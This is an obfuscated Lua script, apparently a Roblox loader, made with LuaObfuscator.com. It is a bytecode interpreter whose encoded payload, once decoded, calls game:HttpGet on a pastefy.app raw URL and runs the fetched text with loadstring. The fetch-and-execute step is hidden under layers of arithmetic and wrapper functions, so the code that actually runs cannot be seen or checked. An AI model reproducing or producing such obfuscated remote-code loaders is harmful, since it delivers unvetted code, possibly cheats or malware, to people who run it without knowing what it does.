--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (0==v82) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v90=v5(v83,v19);v19=nil;return v90;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==(877 -(282 + 595))) then v85=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v85-(v85%(569 -(367 + 201))) ;end end else local v86=(929 -(214 + (2350 -(1523 + 114))))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(226 + 1044)) );v18=v18 + ((4 + 13) -13) ;return (v40 * (16777333 -(32 + 85))) + (v39 * (64226 + 1310)) + (v38 * 256) + v37 ;end local function v24() local v41=957 -(892 + 65) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==1) then v44=1;v45=(v20(v43,2 -(3 -2) ,36 -(34 -(10 + 8)) ) * ((3 -1)^(382 -(87 + 263)))) + v42 ;v41=2;end if (v41==(182 -(67 + 113))) then v46=v20(v43,(61 -45) + 5 ,(517 -(416 + 26)) -44 );v47=((v20(v43,24 + 8 )==(3 -2)) and  -((3042 -2089) -(802 + 150))) or (2 -(1 + 0)) ;v41=5 -2 ;end if ((3 + (0 -0))==v41) then if (v46==(997 -(915 + 82))) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=1 -0 ;v44=1187 -(1069 + 118) ;end elseif (v46==(4643 -2596)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(2^(52 + 0)))) ;end if (v41==(791 -(368 + 423))) then v42=v23();v43=v23();v41=1;end end end local function v25(v48) local v49;if  not v48 then local v87=438 -(145 + 293) ;while true do if (v87==(430 -(44 + 386))) then v48=v23();if (v48==(1486 -(998 + 488))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 + (772 -(201 + 571))) );v18=v18 + v48 ;local v50={};for v65=1 + 0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 1194 -(352 + 842) ;end)();while true do if (v67~=(1 -0)) then else if (v51==1) then local v97=(function() return 0;end)();while true do if (v97~=2) then else v51=(function() return 2;end)();break;end if (v97~=(1822 -(1483 + 338))) then else v58=(function() return {};end)();for v107= #"}",v57 do local v108=(function() return 1695 -(1229 + 466) ;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v108==(579 -(386 + 192))) then v111=(function() return nil;end)();while true do if (v109==(1206 -(696 + 510))) then local v170=(function() return 0 -0 ;end)();while true do if ((1263 -(1091 + 171))==v170) then v109=(function() return 1 + 0 ;end)();break;end if (v170~=0) then else v110=(function() return v21();end)();v111=(function() return nil;end)();v170=(function() return 3 -2 ;end)();end end end if ((3 -2)==v109) then if (v110== #">") then v111=(function() return v21()~=0 ;end)();elseif (v110==(376 -(123 + 251))) then v111=(function() return v24();end)();elseif (v110== #"19(") then v111=(function() return v25();end)();end v58[v107]=(function() return v111;end)();break;end end break;end if (0==v108) then v109=(function() return 0;end)();v110=(function() return nil;end)();v108=(function() return 1;end)();end end end v97=(function() return 2;end)();end if (v97==(0 -0)) then v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v97=(function() return 1;end)();end end end break;end if (v67==0) then if (v51~=0) then else local v98=(function() return 698 -(208 + 490) ;end)();while true do if ((1 + 1)==v98) then v51=(function() return 1;end)();break;end if (v98==(0 + 0)) then v52=(function() return function(v112,v113,v114) local v115=(function() return 836 -(660 + 176) ;end)();local v116=(function() return;end)();while true do if (v115==0) then v116=(function() return 0;end)();while true do if (v116==(0 + 0)) then local v173=(function() return 0;end)();local v174=(function() return;end)();while true do if (v173==(202 -(14 + 188))) then v174=(function() return 675 -(534 + 141) ;end)();while true do if ((0 + 0)~=v174) then else local v180=(function() return 0;end)();while true do if (v180==(0 + 0)) then v112[v113-#"!" ]=(function() return v114();end)();return v112,v113,v114;end end end end break;end end end end break;end end end;end)();v53=(function() return {};end)();v98=(function() return 1;end)();end if (v98~=(1 + 0)) then else v54=(function() return {};end)();v55=(function() return {};end)();v98=(function() return 3 -1 ;end)();end end end if (v51~=(2 -0)) then else v56[ #"91("]=(function() return v21();end)();for v100= #",",v23() do local v101=(function() return v21();end)();if (v20(v101, #"[", #"<")==0) then local v103=(function() return 0 -0 ;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103~=(0 + 0)) then else v104=(function() return v20(v101,2, #"asd");end)();v105=(function() return v20(v101, #"0313",4 + 2 );end)();v103=(function() return 1;end)();end if (v103~=3) then else if (v20(v105, #"asd", #"-19")== #"~") then v106[ #".com"]=(function() return v58[v106[ #".dev"]];end)();end v53[v100]=(function() return v106;end)();break;end if (v103~=2) then else if (v20(v105, #",", #"|")~= #"\\") then else v106[398 -(115 + 281) ]=(function() return v58[v106[2]];end)();end if (v20(v105,2,2)== #"\\") then v106[ #"asd"]=(function() return v58[v106[ #"xxx"]];end)();end v103=(function() return 3;end)();end if (v103==1) then v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==0) then local v157=(function() return 0;end)();local v158=(function() return;end)();while true do if ((0 + 0)==v157) then v158=(function() return 0 -0 ;end)();while true do if (v158~=(0 -0)) then else v106[ #"19("]=(function() return v22();end)();v106[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v104== #",") then v106[ #"-19"]=(function() return v23();end)();elseif (v104==2) then v106[ #"91("]=(function() return v23() -((869 -(550 + 317))^(22 -6)) ;end)();elseif (v104== #"gha") then local v178=(function() return 0;end)();local v179=(function() return;end)();while true do if (v178~=(0 -0)) then else v179=(function() return 0 -0 ;end)();while true do if (v179~=0) then else v106[ #"91("]=(function() return v23() -(2^(301 -(134 + 151))) ;end)();v106[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v103=(function() return 2;end)();end end end end for v102= #"!",v23() do v54,v102,v28=(function() return v52(v54,v102,v28);end)();end return v56;end v67=(function() return 1666 -(970 + 695) ;end)();end end end end local function v29(v59,v60,v61) local v62=v59[1 -0 ];local v63=v59[(673 + 1319) -((2640 -2058) + 1408) ];local v64=v59[10 -7 ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1172 -(418 + 753) ;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -(1 -(1202 -(373 + 829))) ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + (3 -(733 -(476 + 255))) ];else v78[v88]=v75[v88 + (1825 -(1195 + 629)) ];end end local v79=(v76-v70) + (530 -(406 + 27 + 96)) ;local v80;local v81;while true do local v89=(2746 -(553 + 424)) -((3306 -1557) + 20) ;while true do if ((v89==(1 -0)) or (2087>2372)) then if ((v81<=(244 -(187 + 54))) or (1818==85)) then if ((630<2127) and (v81<=((1911 -(369 + 761)) -(162 + 618)))) then if (v81>(0 + 0)) then local v117=0 + 0 ;local v118;while true do if (v117==(0 -0)) then v118=v80[2 -0 ];v78[v118]=v78[v118](v13(v78,v118 + 1 + 0 ,v73));break;end end else v78[v80[1902 -(106 + 1794) ]]();end elseif (v81>(1 + 1)) then do return;end else v78[v80[1638 -(1373 + 263) ]]=v61[v80[1003 -(451 + 549) ]];end elseif (v81<=(2 + 3)) then if (v81==(118 -(4 + 110))) then v78[v80[2 -(0 + 0) ]]=v80[1430 -(41 + (2517 -1131)) ];else local v123;local v124,v125;local v126;local v127;v78[v80[2 -(0 + 0) ]]=v61[v80[1387 -(746 + 638) ]];v72=v72 + 1 + 0 + 0 ;v80=v68[v72];v78[v80[(1 -0) + 1 + 0 ]]=v61[v80[8 -5 ]];v72=v72 + ((239 -(64 + 174)) -(0 + 0)) ;v80=v68[v72];v127=v80[343 -(218 + 53 + 70) ];v126=v78[v80[169 -(122 + 44) ]];v78[v127 + (1582 -(1535 + 46)) ]=v126;v78[v127]=v126[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2 + 0 + 0 ]]=v80[3 + 0 ];v72=v72 + 1 + 0 ;v80=v68[v72];v127=v80[(831 -269) -(306 + 254) ];v124,v125=v71(v78[v127](v13(v78,v127 + (66 -(30 + 35)) ,v80[1 + (338 -(144 + 192)) ])));v73=(v125 + v127) -((217 -(42 + 174)) + 0) ;v123=1257 -(1043 + 214) ;for v150=v127,v73 do local v151=0 -0 ;while true do if (v151==(1212 -(323 + 889))) then v123=v123 + (1 -0) ;v78[v150]=v124[v123];break;end end end v72=v72 + 1 + 0 ;v80=v68[v72];v127=v80[1469 -(899 + 568) ];v78[v127]=v78[v127](v13(v78,v127 + 1 + 0 + 0 ,v73));v72=v72 + (2 -(2 -1)) ;v80=v68[v72];v78[v80[605 -((746 -478) + 335) ]]();v72=v72 + ((651 -360) -(60 + 230)) ;v80=v68[v72];do return;end end elseif (v81==(578 -(426 + 43 + 103))) then local v142=0 + 0 ;local v143;local v144;while true do if (v142==((3037 -(1183 + 397)) -((858 -576) + 1174))) then v78[v143 + 1 + 0 ]=v144;v78[v143]=v144[v80[815 -(569 + 242) ]];break;end if ((v142==((0 -0) -0)) or (4445<4149)) then v143=v80[(754 -(239 + 514)) + 1 ];v144=v78[v80[1 + 2 ]];v142=1025 -(706 + 318) ;end end else local v145=v80[3 -1 ];local v146,v147=v71(v78[v145](v13(v78,v145 + (1252 -(721 + 530)) ,v80[1274 -(945 + 326) ])));v73=(v147 + v145) -(1 + 0 + 0) ;local v148=0 -0 ;for v152=v145,v73 do local v153=0 + 0 ;while true do if ((v153==(700 -(271 + 151 + 278))) or (1938==2514)) then v148=v148 + (1330 -(797 + 532)) + 0 ;v78[v152]=v146[v148];break;end end end end v72=v72 + ((3476 -(1913 + 62)) -(1408 + 92)) ;break;end if (v89==(1121 -(118 + 1003))) then v80=v68[v72];v81=v80[1087 -(335 + 126 + 394 + 231) ];v89=1289 -(993 + 295) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F66432Q4D3548304B2F72617700083Q0012053Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
